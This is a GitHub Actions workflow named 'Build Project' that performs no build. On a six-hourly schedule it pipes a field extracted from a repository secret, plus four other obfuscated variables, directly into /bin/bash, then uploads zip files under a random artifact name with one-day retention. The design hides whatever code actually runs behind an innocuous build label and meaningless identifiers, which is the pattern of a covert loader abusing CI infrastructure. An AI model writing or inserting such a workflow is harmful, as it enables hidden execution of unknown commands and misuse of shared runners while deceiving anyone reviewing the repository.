name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '47 1,7,13,19 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  runner:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Go
        env:
          kn8769: ${{ secrets.kn8769 }}
        run: |
          printf '%s' "$kn8769" | jq -r .pln8631 | /bin/bash
          echo $g29 | jq -r .zgpde7 | /bin/bash
          echo $kh666 | jq -r .ng8 | /bin/bash
          echo $dldar74422 | jq -r .pczjv156 | /bin/bash
          echo $pfpjv161 | jq -r .byvv121 | /bin/bash

      - name: Archive results
        uses: actions/upload-artifact@v4
        with:
          name: Fx6kPw4z
          path: "*.zip"
          retention-days: 1
